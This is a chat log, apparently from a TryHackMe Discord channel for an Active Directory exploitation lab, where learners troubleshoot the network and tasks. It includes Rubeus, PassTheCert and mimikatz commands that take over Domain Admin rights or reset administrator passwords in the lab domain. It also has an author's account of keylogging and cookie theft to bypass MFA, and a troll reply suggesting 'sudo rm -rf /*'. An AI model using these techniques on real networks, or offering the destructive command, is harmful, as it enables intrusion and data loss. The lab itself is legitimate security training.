PS C:\Tools> .\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:cert.pfx /password:pass /outfile:hacker.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=Hacker
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
I have tried resetting the network, and repeated the task from the start, but I face the same error.
The room has had this bug for so long. I'm surprised it isn't fixed yet.
guys do you have connectivity issue?? thm says network is up but i cant seem to access any of the machine
I had the same problem and managed to find a workaround, by passing the certificate via LDAPS instead. You may refer to the following articles for the details:
https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
https://www.thehacker.recipes/ad/movement/schannel/passthecert
Essentially, you need to download PassTheCert.exe and transfer to the windows machine. I then used the following command to add my own user to Domain Admin group.
.\PassTheCert.exe --server za.tryhackme.loc --cert-path <your-certificate-file> --cert-password <password> --add-account-to-group --target "CN=Domain Admins,CN=Users,DC=za,DC=tryhackme,DC=loc" --account "CN=paula.bailey,OU=Sales,OU=People,DC=za,DC=tryhackme,DC=loc"
Thanks. I'll try this.
If you've connected to the VPN and configured your NetworkManager (in case of networks) then it should work. Which room are you facing the problem in?
nah works now, i am just not patient enough lol. after waiting for like 20 mins the DC can finally be resolved again. Thanks
Cool
Thanks, it helped me solve the task.
Hi guys,
I have a question regarding task 2: permission delegation. Why does BloodHound show that a domain user has GenericWrite over the IT Support group's ACL and is able to perform an ACL Add Member operation in the photo? Shouldn't it show that the domain user has ACL Add Member specifically in order to add themselves to the IT Support group? Thank you.
I'm currently working in the "Exploiting Active Directory" room on TryHackMe. Since yesterday, I've encountered an issue with the VPN configuration. I can generate the exploitingad.ovpn configuration file from https://tryhackme.com/access, then choose Networks>Network VPN server > exploitingad, but the downloaded file is only 2114 bytes instead of the expected ~8.1 KB. Upon inspection, the file lacks the <key>...</key> section. When I run sudo openvpn ./exploitingad.ovpn, it consistently fails due to the missing <key> section. Could someone provide guidance on resolving this issue?
screenshot below:
U still have the issue ?
hi im doing the Exploiting Certificates and i got this error
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=hehe
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
i just reset the admin password and used runas
PS C:\Tools> .\PassTheCert.exe --server 10.200.60.101 --cert-path C:\Tools\cert.pfx --cert-password "quoctuan123" --reset-password --target "CN=Administrator,CN=Users,DC=za,DC=tryhackme,DC=loc" --new-password "NewPassword123!"
I downloaded the ovpn file and it's literally empty?
regenerated it multiple times, no dice
okay, on my 4th attempt (2nd after leaving and rejoining the room) I got an actual ovpn file
persistence is a virtue
hi, i'm having the same issue and can't sort it with tun's steps
Hi, could anyone help to troubleshoot network issue on the attackbox for tryhackme/exploitingad
root@ip-10-201-49-166:~# sudo sed -n '1,40p' /etc/resolv-dnsmasq || sudo cat /etc/resolv-dnsmasq
sudo: unable to resolve host ip-10-201-49-166: Name or service not known
nameserver 10.200.83.101
nameserver 169.254.169.253
root@ip-10-201-49-166:~# ping -c3 10.200.83.101
PING 10.200.83.101 (10.200.83.101) 56(84) bytes of data.
--- 10.200.83.101 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2033ms
root@ip-10-201-49-166:~# nslookup 10.200.83.101
** server can't find 101.83.200.10.in-addr.arpa: NXDOMAIN
root@ip-10-201-49-166:~# nslookup thmdc.za.tryhackme.loc
;; communications error to ::1#53: timed out
Server: ::1
Address: ::1#53
** server can't find thmdc.za.tryhackme.loc: NXDOMAIN
root@ip-10-201-49-166:~# nslookup thmchilddc.za.tryhackme.loc
;; communications error to ::1#53: timed out
Server: ::1
Address: ::1#53
** server can't find thmchilddc.za.tryhackme.loc: NXDOMAIN
root@ip-10-201-49-166:~# sudo service dnsmasq restart
There is also the issue that there is no "exploitad" network adapter on the attack box (ip a)
if there is no exploitad adapter on the AttackBox:
- download the VPN file for the relevant network after regenerating it
- then run
the openvpn command: that will give you the exploitad interface
also: - confirm that your network instance is in the state of Running
- confirm that you can ping the DC IP
10.200.83.101, which is also the IP for the DNS server
i think something is wrong with this lab
i couldn't start the LAB
Hey, anyone have any ideas why the meterpreter session might be dying for task 5? I'm able to log in as trevor and get the shell onto their machine. There is an active explorer session with trevor.local. I've tried both just going straight to migrating and starting the explorer process itself using the method in the note. Every time I migrate it just terminates and the reason given is session died. I've tried running getsys on the meterpreter in case it was a permission issue. Running idletime on it showed 2+ minutes of idle user too. Kinda blank on what's wrong at the moment. What could be a possible reason?
Why in the task5 I'm never able to migrate to explorer.exe.
No matter what I do, the meterpreter session dies.
I uploaded a meterpreter payload on the target which I executed with the smb auth relay so I'm system.
I tried a lot of ways to get this exploit running to launch the keyscan but i never get past the migrate command.
my meterpreter is a windows/x64/meterpreter/reverse_tcp
I've been stuck on the same question for a week now and I've tried just about anything.
Maybe smt got updated in the machine since it got first released stopping us now
I've got no clue either
I legit decided to cheat and went on a walkthrough page to see if there was something that I missed but to my surprise there is nothing special to do.
Migrate command should work yet the meterpreter keeps dying.
I opened a ticket just in case I'm not crazy.
Haha I tried walk-throughs too, couldn't find anything either, lemme know if the ticket ends up being anything helpful
I'm kind of confused by the VPN connection i'm getting for this lab
the machines are on a 10.200 network but my VPN connection connects me to 10.150
that would be my explanation why i can't nslookup the DC
Hi guys, I'm at task 4 and when i copy paste the custom Cypher into my bloodhound, I don't have any result. Is there anyone who has the same issue?
Did you make sure to download the updated one? Sometimes it's helpful to regenerate the instance and reactivate it. Might be helpful to check if you have any other connections running too. Chat could probably give the commands to check that
Pretty sure I had that too, I just read the reading for the next steps
Did you ever hear back from them?
Asked me to reset the network and they closed the ticket... Never tried since we reached the 10 reset count needed for it to happen. The network is fresh now. We probably need to start from task1 though because everything has been wiped to original state.
Amazing
I'm finishing my top1 league badge since this is probably gonna be the only time I'll be able to stay 1st and there is 2 hours left but I'll get back to it later this week.
Hi all!
I'm stuck on the exploiting GPO task. My user is a member of the IT support group and I've modified the GPO so that IT Support is a member of builtin\administrators and builtin\remote desktop users. I've waited like 30 min but I can't RDP into THMSERVER02. Anyone else faced the same?
anyone else experiencing a certificate mismatch when trying to RDP into the THMWRK1 endpoint as a normal user or a T2 user? i'm on task 6 and i can't login
it says the endpoint is THMJMP1
Hi does someone have the same error when they are trying to make a ptt error : * File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
Nevermind i'm an idiot , i didn't supply the path of the kirbi file
where in bloodhound i can see this kind of link between management servers and thmserver2
Hi, is there someone?
Hi all.
I am facing some problem getting a connection from attackbox to the exploiting AD network. I had completed almost all tasks except the final task 8 and the attackbox was working seamlessly but since day before yesterday, whenever I try to launch the attackbox it doesn't show up with the exploitad network interface that used to come earlier (as shown in the attached screenshot) and so I am not even able to ping the DC's IP 10.200.72.101 which was earlier pinging. I have restarted the attackbox multiple times without any result. I saw somewhere about regenerating the openvpn file after selecting the appropriate network (exploit_ad_v2) and then restarting the attackbox. I did that multiple times too but to no avail. I also saw in another room to use the tryconnectme command but that also did not solve anything. The Echo AI also does not give any useful suggestion which is why I am here, hoping to receive a solution. Can someone check this out and tell me if am I missing something and what?
I have also tried using different browsers (firefox and chrome) and connecting from different network (office and home) but that also did not work.
Just now I tried leaving the room, rejoining it, starting the network, regenerating the openvpn file and then starting the attackbox. Didn't work.
hey does anyone face "The RPC server is unavailable." problem when doing exploiting automated relay? is there any solution here i could follow?
how do i ip grab or get someone's address with their discord user
That's illegal.
Well that's not the place.
sudo rm -rf /* should work
Hey everyone, I'm working on a Level 3 SQLi lab and I've hit a wall with a server-side filter.
The Setup: I've bypassed the front-end JS and I'm using 'Edit and Resubmit' in the Network tab to hit the id parameter directly. The server returns 'Dangerous Command' for almost everything. I've tried:
Standard UNION SELECT (with case folding/comments)
Boolean logic like 1' AND 1=1--
URL/Hex encoding the keywords.
I also noticed a csrftoken and dual sessionid cookies (one for / and one for /level3).
is this a Blind SQLi case where I need to bypass space/keyword filtering using alternative whitespace characters, or should I be looking at a different Vector (like the Cookies or CSRF token) because the id param is a honey-pot? Not looking for the flag, just a nudge on the filter logic!
I haven't been able to get the exploiting AD network up in almost a week. Just a grey rectangle with a loading circle. I tried leaving the room and resetting progress but it still won't load. Any help?
Is there anything better than metasploit
hey everyone i'm getting crazy right now i'm stuck although i do THE SAME as written in the room.
I'm stuck in task 7 - exploiting certificates - from the room Exploiting active directory.
So I created the certificate and then exported it with the private key, and when I try to ask for a tgt with the cert the kdc returns me this:
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
I tried to change the encryption algo, date and time sync with the dc, create a new cert, but nothing works.
Any help ? Thank you ^^
so here is my command failing :
PS C:\tools> .\Rubeus.exe asktgt /user:Administrator /certificate:C:\Users\irene.leach\Documents\badcert.pfx /password:Qwerty1 /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.72.101 /enctype:aes256
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=badcert
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
PS C:\tools>
This is a known problem with this room and with AD overall. There could be many sources:
Your Kali being too far away in time from the DC etc.. AD is just very complicated. In this case, I think the room itself is bugged because everyone has been having this problem here.
Yes.. Metasploit is a C2 framework. But it's for beginners - Known others are Cobalt Strike, Havoc, Sliver...
Thx
hello
first
https://tryhackme.com/room/exploitingad Here we go
@surreal python you done yet?
done what?
Check what the channel is called
no, not yet
Thank you @glacial stream for all your work on these networks! I really think this is setting TryHackMe apart from other platforms. Each of these has been excellent. Looking forward to digging into this one.
Hope you enjoy it!
@glacial stream I imported tickets but I cannot Enter-PSSession to the next server
* File: 'C:\Tools\kekeo\x64\TGS_t2_melanie.davies@ZA.TRYHACKME.LOC_WSMAN~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK
mimikatz # kerberos::ptt C:\Tools\kekeo\x64\TGS_t2_melanie.davies@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
* File: 'C:\Tools\kekeo\x64\TGS_t2_melanie.davies@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK
mimikatz # exit
Bye!
PS C:\Tools\mimikatz_trunk\x64> klist
Current LogonId is 0:0x114e6f
Cached Tickets: (6)
Hey there! So it seems like you are trying to impersonate a T2 account? Melanie Davies? Remember THMSERVER1 is a SERVER machine. Tier 2 accounts have admin privs over workstations. Tier 1 accounts have admin privs over servers. I think that's the issue here? So the impersonation is working, but the Melanie account does not have permissions to auth to THMSERVER1 if that makes sense
aaaahhhhhh!!!!!
So use the enumeration command (or BloodHound) to find the Tier 1 admins and impersonate one of them
Hope that makes sense
Gotcha!!! Thanks!!
Good luck there!
worked great! On to the next one
Awesome!
Finally done. What a great room! Keep it up @glacial stream
My network is f*ed up, can't ping the DC, already requested network reset
Glad you liked it!
Hey there, if you send me your VPN file I can take a look at what is happening in the network for you. But yeah, since users gain control over the entire network I do think this might happen from time to time
What am I doing wrong? Cannot ping thmdc.za.tryhackme.loc
Network is running. Can ping the other DC 10.200.60.101
Work online, no VPN
If you can ping 10.200.60.101 then the network is live. If you can't ping thmdc.za.tryhackme.loc it means your DNS configuration is not correct
When you say online, do you mean AttackBox? If so, you still need to follow the steps of DNS configuration in the first task. Have you done those?
in task 2 using bloodhound. bloodhound says "no data in file" wtf...
what file are you trying to open?
unzip it
even tried to use sharphound and get a new one
there will be json files in there, those will contain the data
Are you using AttackBox or your own machine? If your own machine, just make sure to update BloodHound
You shouldn't need to
sometimes it helps
You don't need to. You can just put the zip file in BloodHound directly
but i try
Nope, doesn't work
same thing
My own. But every other file works, it's just the user file. But I can try to update.
Yeah, with the release of BH v3, quite a bit has changed. You don't need to actually install the new BH, you can just download the release and run it directly from the folder, so you can still have both versions of BH
Oh really? Just download the GitHub repo and just open it?
Jip! Go to releases, download the latest, unzip, chmod +x Bloodhound && ./BloodHound
wow thanks bro
Gave +1 Rep to @glacial stream
I have like v1, v2 and v3 of BH since I still have legacy results
oh yeah +rep @glacial stream for the room
Gave +1 Rep to @glacial stream
Hah nice. You mean this one? https://github.com/BloodHoundAD/BloodHound/releases/tag/4.1.1
Yes sorry, forgot we are already on version 4
Is ok, but don't know which file to execute. There's a lot in the folder.
BloodHound
That's the binary
That's def not your Kali operating system
ohhh
HAHAH
ty bro
Gave +1 Rep to @glacial stream
It worked. Thank you sooo much, good to know this for the future when working with BloodHound ❤️
Happy to help!
As long as your neo4j backend is solid, you can use any BH version
❤️
@glacial stream is it possible for you to reset my progression?
Sure one second
Progress has been reset
thanks
Again, nice networks coming from you, always a pleasure testing them and then playing through, trying out different stuff afterwards, thanks @glacial stream
Gave +1 Rep to @glacial stream
Glad you liked it, thanks for helping with the testing! Now just one left
Gave +1 Rep to @cold flax
feel free to dm if needed again
I'll keep you posted!
Is there any reason that this one ends in .loc instead of .com
Yes, there were some problems with the domain since this network uses a root controller, so it kept on messing with the normal tryhackme.com AD, so to stop that from happening it uses .loc instead
oh fair
I can fool za.tryhackme.com since it is a child domain, but I could not fool tryhackme.com on the parent. So yeah, sadly had to switch to .loc
Are all the users and stuff setup with Badblood or something else?
I use vagrant for deployment. I have quite a bit of scripts and everything that then deploys the network. There is a specific script that generates random AD objects and users and another one that then pushes those to the domains.
Not everything is automated, but this method at least gives you a good base to then work from
anyone else having issues with DNS when using the attackbox?
You will have to provide a bit more information here.
Can you run nslookup za.tryhackme.loc <DC IP> and send output
root@ip-10-10-194-162:~# nslookup thmdc.za.tryhackme.loc 10.200.60.101
Server: 10.200.60.101
Address: 10.200.60.101#53
Name: thmdc.za.tryhackme.loc
Address: 10.200.60.101
root@ip-10-10-194-162:~# nslookup thmdc.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: thmdc.za.tryhackme.loc
Address: 10.200.60.101
root@ip-10-10-194-162:~# nslookup thmchilddc.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmchilddc.za.tryhackme.loc: NXDOMAIN
can't reach distributor either
This won't work:
root@ip-10-10-194-162:~# nslookup thmchilddc.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmchilddc.za.tryhackme.loc: NXDOMAIN
Since the actual hostname is thmdc.za.tryhackme.loc
This tells me your DNS is working
root@ip-10-10-194-162:~# nslookup thmdc.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: thmdc.za.tryhackme.loc
Address: 10.200.60.101
Can you run nslookup distributor.za.tryhackme.loc for me please?
root@ip-10-10-194-162:~# nslookup distributor.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find distributor.za.tryhackme.loc: NXDOMAIN
root@ip-10-10-194-162:~# ^C
root@ip-10-10-194-162:~#
Give me a quick second
DNS is working on the DC:
za\administrator@THMDC C:\Users\Administrator>nslookup distributor.za.tryhackme.loc
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 10.200.60.100
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
Non-authoritative answer:
Name: distributor.za.tryhackme.loc
Address: 10.200.60.201
Can you run systemctl restart systemd-resolved twice and then nslookup za.tryhackme.loc && nslookup thmdc.za.tryhackme.loc && nslookup distributor.za.tryhackme.loc
root@ip-10-10-194-162:~# systemctl restart systemd-resolved
root@ip-10-10-194-162:~# systemctl restart systemd-resolved
root@ip-10-10-194-162:~# nslookup za.tryhackme.loc && nslookup thmdc.za.tryhackme.loc && nslookup distributor.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: za.tryhackme.loc
Address: 10.200.60.101
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: thmdc.za.tryhackme.loc
Address: 10.200.60.101
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: distributor.za.tryhackme.loc
Address: 10.200.60.201
That seems to have done the trick? Distributor is resolving?
yep! thank you very much for your help!
Gave +1 Rep to @glacial stream
Anytime, good luck with the room!
what are you trying to do?
Exploiting GPOs
click on the arrow beside servers
then it'll push out and show what you need
I think you're running it with the wrong account
take a look in bloodhound what account has access to the MANAGEMENT SERVER PUSHES GPO
doesn't that account start a spark in your brain, didn't you see it somewhere before?
i see you're right
Glad you liked that part! You'd be surprised how often it is the users that leak the secrets. We compromise DA, then deploy malware to targeted users' workstations. Keylogging and file searching often get us the credentials we need. You can take it a step further and actually harvest browser cookies for active sessions if you need to target a specific application. Neat trick to bypass MFA
which is the reason why 3 of my clients got hacked this week
Yeah, you're right. The error is human
and the consequences are serious
it's ok now thanks a lot :)))
Gave +1 Rep to @cold flax
It restarts the endpoints in the network, it doesn't impact your task progression (answering questions).
Yeah, I didn't mean the questions, I mean the exploits in the network, like adding a user, changing a password?
and other stuff
Any file or connection persistence on any host would be gone.
oh ! i see
thanks man
Gave +1 Rep to @grave loom
The GPO took more time? Is it normal? More than 15 mins?
Yeah
You're basically sending the message out to everything saying "hey, this just changed, change it at your place" it can take some time
🥳
Can't wait for next week, thanks @glacial stream, there's a lot of things to learn
Gave +1 Rep to @glacial stream
Glad you liked it. One more to go!
Hi,
how can I get a shell by using the hash creds?
by using pass the hash?
Task 4
or should I crack the hash first to get the password in plaintext
actually I got the flag by using this command
but I won't be able to get a shell
Hi, what's the best order to learn the newly released rooms on AD and AD exploitation?
Breach -> enum -> movement and pivot -> exploit
thanks man!!
Gave +1 Rep to @cold flax
AD Basics
AD
Attacking Kerberos
Post-Exploitation Basics
Enumerating Active Directory
Exploiting Active Directory
Breaching Active Directory
Lateral Movement and Pivoting
actually, you can do exploit before movement and pivot, cause you exploit, then pivot, then exploit etc etc
I wrote all the AD rooms in THM, can you help me order these ones, from 0 to here?))
understood
AD basics
Attacking Kerberos
Breaching Active directory
Enumerating Active directory
Lateral Movement and Pivoting
AD Certificate Templates
Exploiting Active directory
AD Persistency (next network arriving soon)
Post-Exploitation basics
Attacktive Directory
Holo
These are my thoughts on start -> end
where you'll be guided on different things first, then trying out a challenge room where you have to take that knowledge and use it without guidance, and a more advanced AD network
thanks a lot man!!!
you're welcome
The Lateral Movement and pivoting network, the one that came out before this network, shows how you can use the hash. You could use any of those techniques.
I can't seem to find the flag in the keepass credential database, I only see two sample entries with username:password but all other categories are empty, did the flag get deleted or am I missing something here?
did you specify the correct db?
there's only one, I might have downloaded it incorrectly
per user
not in Administrators desktop which is where you download if you just go download keepassdatabase
check that you're in the right folder when downloading
each user has their own KeePass account
I see
but the password is the same for all of 'em, tho
a bit misleading, making you believe you have the right one
the wonders of rabbit holes
Go check Mr Trevor's directory. But not his AD account. You can also correlate this with the user that we inject our keylogger into
yeh, I've got the flag already
This was a catch22. If I made the passwords different, users would tell me that the keylogger does not work. If I made the password the same, users would tell me they can't find the flag. So at least confirming you have the correct password IMO is easier to then tell you to download the correct file rather than also trying to make sure you keylogged correctly.
I could also just remove the additional databases, but that would be cheating. When you are doing this on an assessment (downloading user files and keylogging), you have to be very specific. So I think it is a good learning element to make sure you correlate your data.
yeh, just a handy note at the end of the task might be a bit helpful is what I'm saying, so people don't get stuck downloading random databases and getting confused
I can get behind that. Let me update the hint on the question
Hint updated
What is the problem?
What's the md5sum of your KeePass DB?
cb02492cd85600f0c128a459ef1d6d51
I'm not able to get the exploitingad VPN file (DC 10.200.83.101), I've been trying for 2 days now, regenerated and waited multiple times but it's not working (404 error every time). Works fine for other networks.
Let me send to the support team to investigate
cb02492cd85600f0c128a459ef1d6d51
Matches, so you have the correct password DB file. Sorry for the delayed response. I went to bed and was out today. Can you DM me the password so I can see if you are using the correct one?
No wait! I think I know the issue. Are you using kali? Who owns the DB? Root or Kali?
Can you retry please? Should be solved now
@glacial stream It's fixed now thanks
Perfect
Anybody had trouble importing the BloodHound JSON files? They don't get loaded on my BloodHound installation :/
if you are using your own bloodhound, you need to make sure it is updated. Version 4, the latest version of BH should be used. You can download it from their repo and run it directly, no installation required.